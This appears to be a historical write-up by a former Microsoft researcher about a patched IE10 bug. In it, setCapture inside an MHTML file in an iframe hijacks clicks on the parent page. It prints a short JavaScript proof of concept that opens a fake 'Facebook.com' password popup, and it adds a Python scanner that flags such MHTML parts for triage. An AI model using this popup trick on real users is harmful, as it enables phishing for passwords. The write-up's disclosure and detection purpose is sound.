This is a variation on the setCapture capture family that specifically uses MHTML to make the technique work in contexts where it otherwise would not. From inside any iFrame — even one on a completely different domain, like an evil iframe embedded in a legitimate page — loading an MHTML file that calls setCapture causes clicks anywhere on the main window to route through the iFrame’s document, allowing a popup to be opened that the user believes came from the main page.
// Code inside the MHTML file loaded in the iFrame:
document.body.onclick = function() {
    var win = window.open("", "", "width=400,height=200");
    win.document.title = "Facebook.com";
    win.document.body.innerHTML = 'Please, enter your password...';
};
document.body.setCapture();
The critical observation is that this works only because the code runs inside an MHTML file. The identical code in a regular HTML file does not produce the same behavior — the setCapture call in a regular iFrame does not capture events from the parent document. Tested on Win8 IE10.
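Because the behavior depends on the code being delivered as MHTML, archived or intercepted .mht content can be triaged for it. The following is an added example, not code from the original post: it parses an MHTML archive as MIME multipart/related and flags HTML parts that call setCapture, noting whether the same part also opens a popup. The function name scan_mhtml, the sample archive and its example.test URLs are constructed for illustration.

```python
import email
import re
from email import policy

# Patterns taken from the snippet above: mouse capture plus a scripted popup.
CAPTURE_RE = re.compile(r"\.setCapture\s*\(", re.I)
POPUP_RE = re.compile(r"\bwindow\.open\s*\(", re.I)

def scan_mhtml(raw: bytes):
    """Return one finding per HTML part of an MHTML archive that calls setCapture."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        # get_content() undoes quoted-printable/base64 transfer encoding,
        # so script bodies hidden behind "=3D" style escapes are matched too.
        html = part.get_content()
        if CAPTURE_RE.search(html):
            findings.append({
                "location": str(part.get("Content-Location", "(none)")),
                "popup": bool(POPUP_RE.search(html)),
            })
    return findings

# Constructed sample archive (not a real capture): one suspicious part, one benign.
SAMPLE = (
    b'Content-Type: multipart/related; boundary="b1"; type="text/html"\r\n'
    b"\r\n"
    b"--b1\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Transfer-Encoding: quoted-printable\r\n"
    b"Content-Location: http://example.test/frame.html\r\n"
    b"\r\n"
    b"<html><body><script>document.body.onclick =3D function() {\r\n"
    b'window.open("", "", "width=3D400,height=3D200"); };\r\n'
    b"document.body.setCapture();</script></body></html>\r\n"
    b"--b1\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Location: http://example.test/benign.html\r\n"
    b"\r\n"
    b"<html><body>hello</body></html>\r\n"
    b"--b1--\r\n"
)

if __name__ == "__main__":
    print(scan_mhtml(SAMPLE))
```

A match is only a triage signal: setCapture also has legitimate uses such as drag handling, so flagged parts still need manual review.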
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.